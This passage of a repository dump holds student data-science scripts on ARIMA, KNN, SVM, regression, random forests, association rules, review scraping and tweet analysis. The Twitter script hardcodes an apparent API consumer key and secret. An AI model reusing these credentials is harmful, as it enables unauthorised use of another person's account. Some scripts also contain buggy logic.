df.shift(4)],axis = 1)\r\n\r\ndf_shifted.columns = ['actual','shifted']\r\ndf_shifted = df_shifted.dropna()\r\n\r\nfrom sklearn.metrics import mean_squared_error\r\ndf_rmse = np.sqrt(mean_squared_error(df_shifted.actual,df_shifted.shifted ))\r\nprint(df_rmse) #363.783\r\n\r\nfrom statsmodels.graphics.tsaplots import plot_acf,plot_pacf\r\nplot_acf(df)\r\n# q = 4\r\nplot_pacf(df)\r\n# p = 1\r\n\r\nfrom statsmodels.tsa.arima_model import ARIMA\r\nmodel = ARIMA(df,order = (3,1,1))\r\nmodel.fit()\r\n\r\n#best possible values for p d qubing trial and erroe method\r\npv = range(0,4)\r\ndv = range(0,3)\r\nqv = range(0,3)\r\n\r\nfor p in pv:\r\n for d in dv:\r\n for q in qv:\r\n order = (p,d,q)\r\n pred = list()\r\n for i in range(len(df)):\r\n try:\r\n model = ARIMA(df, order)\r\n result = model.fit(disp = 0)\r\n pred_y = result.forecast()[0]\r\n pred.append(pred_y)\r\n error = mean_squared_error(df,pred)\r\n print('arima %s MSE = %.2f'% (order, error))\r\n except:\r\n continue\r\naa = print('arima %s MSE = %.2f'% (order, error))\r\n\r\n\r\n\r\n" }, { "alpha_fraction": 0.6231244206428528, "alphanum_fraction": 0.6469550132751465, "avg_line_length": 26.683544158935547, "blob_id": "51b09be05041f1bac279792045bb41b1cc2d081d", "content_id": "fa5915183919947183e14b74ed65ec5c011edf1c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2266, "license_type": "no_license", "max_line_length": 90, "num_lines": 79, "path": "/KNN/zoo.py", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Oct 2 20:26:39 2020\r\n\r\n@author: Admin\r\n\"\"\"\r\n\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\n\r\ndata = pd.read_csv('E:\\\\Tej\\\\Assignments\\\\Asgnmnt\\\\KNN\\\\Zoo.csv')\r\ndata\r\n\r\n#EDA and Preprocessing\r\ndata.describe()\r\ndata.info() #no null values\r\ndata.nunique()\r\ndata.columns\r\n\r\nfor col in data:\r\n plt.figure(figsize = (15,10))\r\n sns.barplot(data[col].value_counts().index,data[col].value_counts())\r\n plt.show()\r\n# =============================================================================\r\n# most animals don't have feathers\r\n# less number of animals are airborne\r\n# most animals do not have backbone\r\n# not animals animals are mostly categorized into 4 and 7 groups\r\n# very less number of animals are venomous\r\n# very less number of animals have fins\r\n# mostly animals are not domestic\r\n# most animals have 4 legs\r\n# =============================================================================\r\n\r\nX = data.iloc[:,1:17]\r\nY = data.iloc[:,-1]\r\n\r\n#splitting into train test\r\nfrom sklearn.model_selection import train_test_split\r\nx_train,x_test,y_train,y_test = train_test_split(X,Y, test_size = 0.25, random_state = 42)\r\n\r\n####conventional method####\r\n#KNN classification\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nmodel = KNeighborsClassifier(n_neighbors = 5)\r\nmodel.fit(x_train,y_train)\r\nmodel.predict(x_test)\r\n\r\n#train accuracy\r\nmodel.score(x_train,y_train) #0.9333\r\n\r\n#test accuracy\r\nmodel.score(x_test,y_test) #0.8846\r\n\r\n#predicting esults on original dataset\r\ndata['y_pred'] = model.predict(X)\r\n#overall accuray\r\nmodel.score(X,Y) #0.92\r\n\r\n#getting dataframe of outcomes comparing with original types\r\noutcome = data[['animal name','type','y_pred']].sort_values('y_pred')\r\n\r\n####Using for Loop####\r\nfrom sklearn import metrics\r\nk_range = range(1,10)\r\nscores={}\r\nscores_list = []\r\nfor k in k_range:\r\n model = KNeighborsClassifier(n_neighbors = k)\r\n model.fit(x_train,y_train)\r\n y_pred = model.predict(x_test)\r\n scores[k]= metrics.accuracy_score(y_test,y_pred)\r\n scores_list.append(metrics.accuracy_score(y_test,y_pred))\r\n \r\nprint(scores_list)\r\n#highest accuracy is obtained with 2 and 3 number of clusters that is 100% and 96.15%\r\n" }, { "alpha_fraction": 0.6371570825576782, "alphanum_fraction": 0.6608479022979736, "avg_line_length": 22.676923751831055, "blob_id": "f989bb710ad2a5a22b2c0a6502402e7a0b0155b8", "content_id": "b4a47e3d430317a07b6d84e21e98673ca44cc1a0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1604, "license_type": "no_license", "max_line_length": 114, "num_lines": 65, "path": "/SVM/salary_svm.py", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Oct 2 10:09:02 2020\r\n\r\n@author: Admin\r\n\"\"\"\r\n\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\ndf_train = pd.read_csv('E:\\\\Tej\\\\Assignments\\\\Asgnmnt\\\\SVM\\\\SalaryData_Train.csv')\r\ndf_test = pd.read_csv('E:\\\\Tej\\\\Assignments\\\\Asgnmnt\\\\SVM\\\\SalaryData_Test.csv')\r\n\r\ndf_train.describe()\r\ndf_train.info()\r\ndf_train.columns\r\n\r\ndf_cat = ['workclass', 'education','maritalstatus','occupation', 'relationship', 'race', 'sex','native', 'Salary']\r\n\r\nfrom sklearn.preprocessing import LabelEncoder\r\nnumber =LabelEncoder()\r\n\r\nfor i in df_cat:\r\n df_train[i] = number.fit_transform(df_train[i])\r\n \r\nfor i in df_cat:\r\n df_test[i] = number.fit_transform(df_test[i])\r\n \r\nx_train = df_train.iloc[:,0:13]\r\ny_train = df_train.iloc[:,-1]\r\nx_test = df_test.iloc[:,0:13]\r\ny_test = df_test.iloc[:,-1]\r\n\r\n#barplot of the data\r\nimport seaborn as sns\r\nfor col in df_train:\r\n plt.figure(figsize=(10,4))\r\n sns.barplot(df_train[col].value_counts().index,df_train[col].value_counts())\r\n plt.tight_layout()\r\n \r\n##rbf kernel\r\nfrom sklearn.svm import SVC\r\nmodel = SVC(kernel = 'rbf')\r\nmodel.fit(x_train,y_train)\r\n\r\nmodel.predict(x_test)\r\nmodel.score(x_test,y_test) #0.7964\r\n\r\n##poly kernel\r\nmodel_poly = SVC(kernel = 'poly')\r\nmodel_poly.fit(x_train,y_train)\r\n\r\nmodel_poly.predict(x_test)\r\nmodel_poly.score(x_test,y_test) #0.7795\r\n\r\n##sigmoid kernel.\r\nmodel_sig = SVC(kernel = 'sigmoid')\r\nmodel_sig.fit(x_train,y_train)\r\n\r\nmodel.predict(x_test)\r\nmodel_sig.score(x_test,y_test) #0.7568\r\n\r\n#we will go for rbf kernel giving maximum accuracy\r\n" }, { "alpha_fraction": 0.6427703499794006, "alphanum_fraction": 0.6707168817520142, "avg_line_length": 23.78125, "blob_id": "4ca498af23a7651ff22b26f554a39df5d80d2860", "content_id": "7ddae85824a24a9779d38adb3dc5b1dcdfadc5f8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 823, "license_type": "no_license", "max_line_length": 93, "num_lines": 32, "path": "/KNN/forestfires.py", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Feb 26 19:44:50 2021\r\n\r\n@author: Admin\r\n\"\"\"\r\n\r\n\r\n# KNN Classification\r\nfrom pandas import read_csv\r\nimport numpy as np\r\nfrom sklearn.model_selection import KFold\r\nfrom sklearn.model_selection import cross_val_score\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\n\r\nfilename = read_csv('E:\\\\Tej\\\\Assignments\\\\Asgnmnt\\\\KNN\\\\forestfires.csv')\r\nnames = [\r\n 'month', 'day', 'FFMC', 'DMC', 'DC', 'ISI', 'temp', 'RH', 'wind', 'rain','Size_Categorie'\r\n]\r\n\r\ndataframe = read_csv('E:\\\\Tej\\\\Assignments\\\\Asgnmnt\\\\KNN\\\\forestfires.csv', names=names)\r\narray = dataframe.values\r\nX = array[:, 4:11]\r\nY = array[:, -1]\r\n\r\nnum_folds = 10\r\nkfold = KFold(n_splits=10)\r\n\r\nmodel = KNeighborsClassifier(n_neighbors=17)\r\nresults = cross_val_score(model, X, Y, cv=kfold)\r\n\r\nprint(results.mean())" }, { "alpha_fraction": 0.6878612637519836, "alphanum_fraction": 0.7142857313156128, "avg_line_length": 29.454545974731445, "blob_id": "a7aedd6af0f5d20c1d2ccf8d563445f7f8ef7c0a", "content_id": "6e3a314baf991b31212d9b21d9d6232865415cfb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2422, "license_type": "no_license", "max_line_length": 160, "num_lines": 77, "path": "/Simple linear regression/delivery time.py", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Sep 9 14:25:41 2020\r\n\r\n@author: Admin\r\n\"\"\"\r\n\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nimport statsmodels.formula.api as smf\r\n\r\ndata= pd.read_csv('E:\\Tej\\Assignments\\Asgnmnt\\Simple linear regression\\delivery_time.csv',encoding='ISO-8859-1')\r\ndata\r\n\r\ndata.describe()\r\ndata.info()\r\n\r\ndata.head()\r\ndata.tail()\r\n\r\ndata.columns\r\n\r\nsns.pairplot(data)\r\n\r\nplt.hist(data['Delivery_Time']) #data are not normal\r\nhelp(plt.boxplot)\r\nplt.boxplot(data['Delivery_Time'],vert=True, patch_artist=True)\r\n\r\nplt.hist(data['Sorting_Time']) # data are not normal\r\nplt.boxplot(data['Sorting_Time'],0,'rs',vert=True,patch_artist=True)\r\n\r\nplt.plot(data['Delivery_Time'],data['Sorting_Time'],'co');plt.xlabel('Delivery_Time');plt.ylabel('Sorting_Time');plt.title('Scatterplot')\r\nhelp(plt.plot)\r\n\r\ndata['Delivery_Time'].corr(data['Sorting_Time']) #0.8259 moderate correlation\r\nnp.corrcoef(data['Delivery_Time'],data['Sorting_Time'])\r\n\r\n#building model\r\nmodel1= smf.ols('data.iloc[:,0]~data.iloc[:,1]',data=data).fit()\r\nmodel1.summary() #R-squared=0.682\r\n\r\n#transforming variables for accuracy\r\n#model2 = smf.ols('AT~np.log(Waist)',data=wcat).fit()\r\nmodel2 = smf.ols('Delivery_Time ~ np.log(Sorting_Time)',data=data).fit()\r\nmodel2.summary() #R squared improved to 0.711\r\n\r\n#again transforming the model\r\nmodel3= smf.ols('np.log(Delivery_Time)~np.log(Sorting_Time)',data=data).fit()\r\nmodel3.summary() # R squared 0.772 this is not a strong model since R-squared<0.8\r\n# so, we will consider this model aas the final model with highest R-squared value\r\n\r\npred_3= model3.predict(pd.DataFrame(data['Sorting_Time']))\r\npred_3.corr(data['Sorting_Time'])\r\npred_3\r\npred3=np.exp(pred_3)\r\npred3\r\npred3.corr(data['Sorting_Time'])\r\n\r\ndata['predicted']=pred3\r\ndata\r\nplt.scatter(data['Sorting_Time'],data['Delivery_Time']);plt.plot(data['Sorting_Time'],pred3,color='blue');plt.xlabel('Sorting_Time');plt.ylabel('Delivery_Time')\r\n\r\nresid=pred3-data['Delivery_Time']\r\nresid\r\n#residuals of entire dataset\r\nstudent_resid= model3.resid_pearson\r\nstudent_resid\r\nplt.plot(student_resid,'o');plt.axhline(y=0,color='green');plt.xlabel('Observed numbers');plt.ylabel('standardized residuals')\r\nplt.hist(student_resid)\r\n\r\n#predicted Vs. Actual values\r\nplt.scatter(pred3,data.Delivery_Time,color='red');plt.xlabel('predicted');plt.ylabel('actual')\r\n\r\nmodel3.conf_int(0.05)\r\n" }, { "alpha_fraction": 0.6814903616905212, "alphanum_fraction": 0.7103365659713745, "avg_line_length": 35.818180084228516, "blob_id": "5e9e0ff0bfd9be36fcd70a22e4d2fe30fe3cfe80", "content_id": "4cd311ad9d5fb2eb0f52fb340edcf57c14347e58", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 832, "license_type": "no_license", "max_line_length": 86, "num_lines": 22, "path": "/Hypothesis/cof.R", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "####customer_order_form####\r\n#Defective % do not vary by centre for all countries\r\n#defective % vary by centre by centre for at least one country\r\ncust <- read.csv('E:\\\\Tej\\\\Assignments\\\\Asgnmnt\\\\Hypothesis\\\\Costomer+OrderForm.csv')\r\nView(cust)\r\n\r\ncust$Phillippines2[cust$Phillippines=='Error Free']='1'\r\ncust$Indonesia2[cust$Indonesia=='Error Free']='1'\r\ncust$Malta2[cust$Malta=='Error Free']='1'\r\ncust$India2[cust$India=='Error Free']='1'\r\n\r\ncust$Phillippines2[cust$Phillippines=='Defective']='0'\r\ncust$Indonesia2[cust$Indonesia=='Defective']='0'\r\ncust$Malta2[cust$Malta=='Defective']='0'\r\ncust$India2[cust$India=='Defective']='0'\r\n\r\nstacked <- stack(cust)\r\nstacked\r\na <- table(stacked$ind,stacked$values)\r\nchisq.test(a)\r\n#p-value is 0.2721 >0.05 --> Fail to reject Ho\r\n#Thus,Defective % do not vary by centre for all countries\r\n" }, { "alpha_fraction": 0.5726091861724854, "alphanum_fraction": 0.6060606241226196, "avg_line_length": 31, "blob_id": "1a15c0a24b854cc6ade2598ffc1dbcb050f85dc1", "content_id": "02932bd86c4f0bfb8f43e7c5d990e3f3cd1daf22", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2541, "license_type": "no_license", "max_line_length": 240, "num_lines": 77, "path": "/Text mining 1/reviews.py", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Nov 4 16:07:22 2020\r\n\r\n@author: Admin\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom wordcloud import WordCloud\r\nimport nltk\r\nfrom nltk.corpus import stopwords\r\nimport requests\r\nfrom bs4 import BeautifulSoup as bs\r\nimport re\r\n\r\nreviews = []\r\nfor i in range(1,20):\r\n ip=[]\r\n url=\"https://www.amazon.in/Sony-HT-S20R-Soundbar-Bluetooth-Connectivity/dp/B084685MT1/ref=sr_1_1?crid=1AS0CVH00ZXCK&dchild=1&keywords=sony+home+theatre+5.1+with+bluetooth+with+bass&qid=1602513091&sprefix=sony+%2Caps%2C443&sr=8-1\"+str(i)\r\n response = requests.get(url)\r\n soup=bs(response.content,\"html.parser\")\r\n reviews1=soup.findAll(\"span\",attrs={\"class\",\"a-size-base review-text\"})\r\n for i in range(len(reviews1)):\r\n ip.append(reviews1[i].text) \r\n reviews=reviews+ip \r\n \r\nwith open(\"ecom_rev.txt\",\"w\",encoding='utf8') as output:\r\n for i in reviews:\r\n output.write(i+\"\\n\\n\")\r\nrev_string = \" \".join(reviews)\r\nrev_string = re.sub(\"[^A-Za-z\" \"]+\",\" \",rev_string).lower()\r\nrev_string = re.sub(\"[0-9\" \"]+\",\" \",rev_string)\r\nreviews_words = rev_string.split(\" \")\r\n\r\n#getting word cloud for reviews\r\nstop_words = stopwords.words('english')\r\nwith open(\"stop.txt\",\"r\") as sw:\r\n stopwords = sw.read()\r\nstopwords = stopwords.split(\"\\n\")\r\nstp_wrds_final = stopwords+stop_words\r\nreviews_words = [w for w in reviews_words if not w in stp_wrds_final]\r\nrev_string = \" \".join(reviews_words)#for word cloud\r\nwordcloud_rev = WordCloud(\r\n background_color='white',\r\n width=1800,\r\n height=1400\r\n ).generate(rev_string)\r\n\r\nplt.imshow(wordcloud_rev)\r\n\r\n#positive words wordcloud\r\nwith open(\"positive-words.txt\",\"r\") as pos:\r\n poswords = pos.read().split(\"\\n\")\r\nposwords = poswords[36:]\r\npos_rev = \" \".join ([w for w in reviews_words if w in poswords])\r\nwordcloud_pos = WordCloud(\r\n background_color='black',\r\n width=1800,\r\n height=1400\r\n ).generate(pos_rev)\r\n\r\nplt.imshow(wordcloud_pos)\r\n\r\n#negative words wordcloud\r\nwith open(\"negative-words.txt\",\"r\") as neg:\r\n negwords = neg.read().split(\"\\n\")\r\nnegwords = negwords[37:]\r\nneg_rev = \" \".join ([w for w in reviews_words if w in negwords])\r\n\r\nwordcloud_neg = WordCloud(\r\n background_color='black',\r\n width=1800,\r\n height=1400\r\n ).generate(neg_rev)\r\n\r\nplt.imshow(wordcloud_neg)\r\n" }, { "alpha_fraction": 0.6652719378471375, "alphanum_fraction": 0.6852958798408508, "avg_line_length": 33.978492736816406, "blob_id": "560588fbd5281acce187b37f5ad4ef77a8afa1e3", "content_id": "33a29165b949ae1dd1741eb89ade3982f52618fd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3346, "license_type": "no_license", "max_line_length": 101, "num_lines": 93, "path": "/Random forest/Fraud_check_RF.py", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Sep 30 18:03:05 2020\r\n\r\n@author: Admin\r\n\"\"\"\r\n\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\ndata = pd.read_csv('E:\\\\Tej\\\\Assignments\\\\Asgnmnt\\\\Random forest\\\\Fraud_check.csv')\r\ndata.describe()\r\ndata.info()\r\ndf = data['Taxable.Income']\r\ndata['status'] = np.where(df<=30000,'Risky','Good')\r\ndata.columns\r\ndata_cat=['Undergrad', 'Marital.Status','Urban', 'status']\r\n\r\n#Encoding Categorical data\r\nfrom sklearn.preprocessing import LabelEncoder\r\nnum = LabelEncoder()\r\nfor i in data_cat:\r\n data[i] = num.fit_transform(data[i])\r\n \r\n#EDA\r\nimport seaborn as sns\r\nsns.countplot(x='Undergrad',data=data).plot(kind = 'bar')\r\nsns.countplot(x='Marital.Status',data=data).plot(kind = 'bar')\r\nsns.countplot(x='Urban',data=data).plot(kind = 'bar')\r\nsns.countplot(x='status',data=data).plot(kind = 'bar') #largely imbalanced\r\n\r\nsns.boxplot(x= 'Marital.Status',y= 'City.Population',data = data)\r\nsns.boxplot(x= 'status',y= 'City.Population',data = data)\r\nsns.boxplot(x= 'status',y= 'Work.Experience',data = data)\r\n\r\npd.crosstab(data['Marital.Status'],data.status).plot(kind = 'bar')\r\n#dropping the Taxable.Income Column as we've converted it into the categorical variable\r\ndata = data.drop('Taxable.Income',axis = 1)\r\n\r\n##Oversampling to avoid any information loss and to deal with the bias\r\ndata.status.value_counts() # 0=476,1=124\r\nmajority_class = data[data.status == 0]\r\nminority_class = data[data.status == 1]\r\n\r\nfrom sklearn.utils import resample\r\nminority_class_unsampled = resample(minority_class,\r\n replace = True, #sample with replacement\r\n n_samples = 476, #to match majority class\r\n random_state = 123) #reproducible results\r\n\r\ndf_unsampled = pd.concat([majority_class,minority_class_unsampled])\r\ndf_unsampled.status.value_counts() # 0=476,1 =476\r\npd.crosstab(df_unsampled['Marital.Status'],df_unsampled.status).plot(kind = 'bar') #no bias\r\n\r\n#separating x and y variables\r\nX= df_unsampled.iloc[:,0:6]\r\nY= df_unsampled.iloc[:,-1]\r\n\r\n\r\n#splitting into test and train data\r\nfrom sklearn.model_selection import train_test_split\r\nx_train,x_test,y_train,y_test = train_test_split(X,Y, test_size = 0.3,random_state = 42)\r\n\r\n#building Random forest classifier\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nmodel = RandomForestClassifier(n_jobs = 8,oob_score = True,n_estimators = 1500,criterion = 'entropy')\r\nmodel.fit(x_train,y_train) #fiting the model on training dataset\r\nmodel.classes_ #class labels\r\nmodel.n_classes_ #number oof levels in class variable\r\nmodel.n_features_ #nuber of features\r\n\r\nmodel.score(x_train,y_train) #1.0\r\nmodel.score(x_test,y_test) #1.0\r\n\r\n#storing results for original dataset\r\ndata['y_pred'] = model.predict(data.iloc[:,0:5])\r\n\r\n#calculating feature importances\r\nfea_imp = pd.DataFrame(model.feature_importances_,\r\n index = X.columns,\r\n columns = ['importance']).sort_values('importance',ascending = False)\r\n#taxable income gives 93% information\r\n\r\n#confusion matrix\r\nfrom sklearn.metrics import confusion_matrix\r\ncm = print(confusion_matrix(data.y_pred,data.status))\r\n\r\n#accuracy of model on original dataset\r\nnp.mean(data.y_pred == data.status) #1.0\r\n\r\n#accuracy of model on resampled dataset\r\nmodel.score(X,Y) #1.0\r\n" }, { "alpha_fraction": 0.7211394309997559, "alphanum_fraction": 0.7396301627159119, "avg_line_length": 35.71697998046875, "blob_id": "cba9d604356006a7c76c6a783936753655f93182", "content_id": "4776c8a5dd6783b8ac7d3cce29caf168318d86a0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2001, "license_type": "no_license", "max_line_length": 130, "num_lines": 53, "path": "/Association Rules/books.py", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "\r\n\r\n# -*- coding: utf-8 -*-\r\n\"\"\"Created on Sat Sep 26 15:31:23 2020\r\n\r\n@author: Admin\"\"\"\r\n\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom mlxtend.frequent_patterns import apriori, association_rules\r\nfrom mlxtend.preprocessing import TransactionEncoder\r\n\r\nbooks= pd.read_csv('D:\\\\ML Docs\\\\Excelr\\\\Assignments\\\\Association rules\\\\book.csv')\r\nbooks\r\n\r\nfrequent_itemsets= apriori(books,min_support=0.05,use_colnames=True,max_len=3)\r\nfrequent_itemsets\r\n\r\nfrequent_itemsets=frequent_itemsets.sort_values('support',ascending=False,inplace= False)\r\n\r\nplt.figure(figsize=(25,10))\r\nplt.bar(x=list(range(1,11)),height=frequent_itemsets.support[1:11]);plt.xticks(list(range(1,11)),frequent_itemsets.itemsets[1:11])\r\nplt.xlabel('itemsets');plt.ylabel('support')\r\n\r\nrules= association_rules(frequent_itemsets,metric=\"lift\",min_threshold=1)\r\nrules1=rules.sort_values('lift',ascending=False,inplace=False)\r\n\r\n#removing redundancy\r\ndef slist(i):\r\n return (sorted(list(i))) #sort - to sort the string alphabetically\r\n\r\nconcat= rules1.antecedents.apply(slist) + rules1.consequents.apply(slist)\r\nconcat=concat.apply(sorted) #sort - to sort the string alphabetically\r\n\r\nrule_sets=list(concat) #converting concat to list from series\r\n\r\nuni_rule_sets= [list(m) for m in set(tuple(i) for i in rule_sets )] #set- to remove the duplicate elements\r\n\r\nindex_sets= []\r\nfor i in uni_rule_sets:\r\n index_sets.append(rule_sets.index(i))\r\n \r\n# getting rules without any redudancy \r\nrules_no_red = rules.iloc[index_sets,:]\r\n\r\n#sorting rules wrt lift associated with them\r\nrules_no_red.sort_values('lift',ascending= False).head()\r\n\r\n#persons who bought 'Italcook' also bought 'CookBks' and 'ArtBks'\r\n#persons buying 'GeogBks' and 'ChildBks' have bought 'Italcook'\r\n#perosns buying 'CookBks' also buy 'ItalBks' \r\n# and many more such rules can be made as per the mentioned in rules_no_red and giving offers or discounts to the audeience as per\r\n#the formed rules will yield the better profits" }, { "alpha_fraction": 0.573721170425415, "alphanum_fraction": 0.594115674495697, "avg_line_length": 29.15625, "blob_id": "8bf10a2c921c264e78f5c741629a5df00a514b80", "content_id": "40692d840b11fb4df6d38dee92a2561195edb265", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2991, "license_type": "no_license", "max_line_length": 100, "num_lines": 96, "path": "/Text mining 1/twitter_practise.py", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Dec 4 14:39:03 2020\r\n\r\n@author: Lenovo\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nimport warnings \r\nimport tweepy\r\nfrom wordcloud import WordCloud\r\nfrom textblob import TextBlob\r\n\r\n#authentication\r\nconsumer_key = \"e5er9Ba7ACWjxmkCSCEpdMTv2\"\r\nconsumer_secret = \"Qv1BfqtglOWoh3F7olX1G0Tsa2JbDuus7KEdSmJkGL1JMKpQwT\"\r\n\r\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\r\napi = tweepy.API(auth)\r\n\r\n#getting first 200 tweets\r\nuserID = 'realDonaldTrump'\r\ntweets = api.user_timeline(screen_name = userID,\r\n count = 200,\r\n include_rts = False,\r\n tweet_mode = 'extended'\r\n )\r\n\r\noldest = tweets[-1].id - 1\r\n\r\nall_tweets = []\r\nall_tweets.extend(tweets)\r\noldest_id = tweets[-1].id\r\nwhile True:\r\n tweets = api.user_timeline(screen_name = userID,\r\n count = 200,\r\n include_rts = False,\r\n max_id = oldest_id - 1,\r\n tweet_mode = 'extended'\r\n )\r\n if len(tweets) == 0:\r\n break\r\n oldest_id = tweets[-1].id\r\n all_tweets.extend(tweets)\r\n print('no. of tweets downloaded : {}'.format(len(all_tweets)))\r\n\r\n#data cleaning\r\nfrom pandas import DataFrame\r\nouttweets = [[tweet.id_str, \r\n tweet.created_at, \r\n tweet.favorite_count, \r\n tweet.retweet_count,\r\n tweet.full_text.encode(\"utf-8\").decode(\"utf-8\")]\r\n for idx,tweet in enumerate(all_tweets)]\r\ndf = DataFrame(outtweets,columns=[\"id\",\"created_at\",\"favorite_count\",\"retweet_count\", \"text\"])\r\n\r\nimport re\r\ndef cleanUpTweet(txt):\r\n # Remove mentions\r\n txt = re.sub(r'@[A-Za-z0-9_]+', '', txt)\r\n # Remove hashtags\r\n txt = re.sub(r'#', '', txt)\r\n # Remove retweets:\r\n txt = re.sub(r'RT : ', '', txt)\r\n # Remove urls\r\n txt = re.sub(r'https?:\\/\\/[A-Za-z0-9\\.\\/]+', '', txt)\r\n txt.lower\r\n return txt\r\n\r\nfrom sklearn.feature_extraction.text import CountVectorizer\r\n\r\ncv = CountVectorizer(stop_words = 'english')\r\nwords = cv.fit_transform(df.text)\r\nsum_words = words.sum(axis=0)\r\n\r\nwords_freq = [(word, sum_words[0, i]) for word, i in cv.vocabulary_.items()]\r\nwords_freq = sorted(words_freq, key = lambda x: x[1], reverse = True)\r\nfrequency = pd.DataFrame(words_freq, columns=['word', 'freq'])\r\n\r\n#frequency plot\r\nfrequency.head(30).plot(x='word', y='freq', kind='bar', figsize=(15, 7), color = 'blue')\r\nplt.title(\"Most Frequently Occuring Words - Top 30\")\r\n#https, bjp, india, people ,modi\r\n\r\n#plotting wordcloud\r\nall_words = ' '.join([text for text in df['text']])\r\nfrom wordcloud import WordCloud\r\nwordcloud = WordCloud(width=800, height=500, random_state=21, max_font_size=110).generate(all_words)\r\nplt.title('Dhruv Rathee Tweet Analysis')\r\nplt.figure(figsize=(10, 7))\r\nplt.imshow(wordcloud, interpolation=\"bilinear\")\r\nplt.axis('off')\r\nplt.show()\r\n" }, { "alpha_fraction": 0.6868746280670166, "alphanum_fraction": 0.7133607864379883, "avg_line_length": 22.623188018798828, "blob_id": "4a23c3fffaeb6a9eed69e3869a3ed1871787de11", "content_id": "43e2367a26fc587e8f7ed797822b56ecb11d449a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1699, "license_type": "no_license", "max_line_length": 148, "num_lines": 69, "path": "/Simple linear regression/salarydata.py", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Sep 9 18:30:05 2020\r\n\r\n@author: Admin\r\n\"\"\"\r\n\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nimport statsmodels.formula.api as smf\r\nimport scipy.stats as stats\r\n\r\n#importing dataset\r\ndf= pd.read_csv('E:\\Tej\\Assignments\\Asgnmnt\\Simple linear regression\\Salary_Data.csv',encoding='ISO-8859-1')\r\ndf\r\n\r\ndf.columns\r\ndf.head()\r\ndf.tail()\r\n\r\ndf.info() #no null values\r\ndf.describe()\r\n\r\nplt.hist(df.YearsExperience) #Data not normal\r\nplt.plot(df.YearsExperience,'ro')\r\n\r\nplt.hist(df.Salary) #Data not normal\r\nplt.plot(df.Salary,'ro')\r\n\r\nprob_YE= stats.shapiro(df['YearsExperience'])\r\nprob_YE\r\n#pvalue=0.1033>0.05, data is normal\r\n\r\nprob_sal=stats.shapiro(df['Salary'])\r\nprob_sal\r\n#pvalue=0.015<0.05,data is not normal\r\n\r\ndf['Salary'].corr(df['YearsExperience'])\r\n#strong correlation 0.978\r\nnp.corrcoef(df['Salary'],df['YearsExperience'])\r\n\r\n#building model\r\nmodel1= smf.ols('Salary~YearsExperience',data=df).fit()\r\nmodel1.summary() #R-squared=0.957 ,strong model\r\n\r\npred=model1.predict(pd.DataFrame(df['YearsExperience']))\r\npred\r\n\r\ndf['Predicted_Salary']= pred\r\ndf\r\n\r\n#residuals\r\nresid= pred-df['Salary']\r\nresid\r\n\r\n#finding standardized residuals\r\nstudent_resid=model1.resid_pearson\r\nstudent_resid\r\n\r\nplt.plot(student_resid,'ro');plt.axhline(y=0);plt.xlabel('Observed Values');plt.ylabel('standardized error')\r\n\r\n#best fit line of the model\r\nplt.scatter(df['YearsExperience'],df['Salary']);plt.plot(df['YearsExperience'],pred,color='blue');plt.xlabel('YearsExperience');plt.ylabel('Salary')\r\n\r\n#predicted vs Actual values\r\nplt.plot(pred,df['Salary'],'bo'); xlabel('Actual Salary');ylabel('Predicted Salary')\r\n" }, { "alpha_fraction": 0.6633303165435791, "alphanum_fraction": 0.6892629861831665, "avg_line_length": 22.69662857055664, "blob_id": "b5314ce4df245b7ac2de458eb3d483b9601ebf92", "content_id": 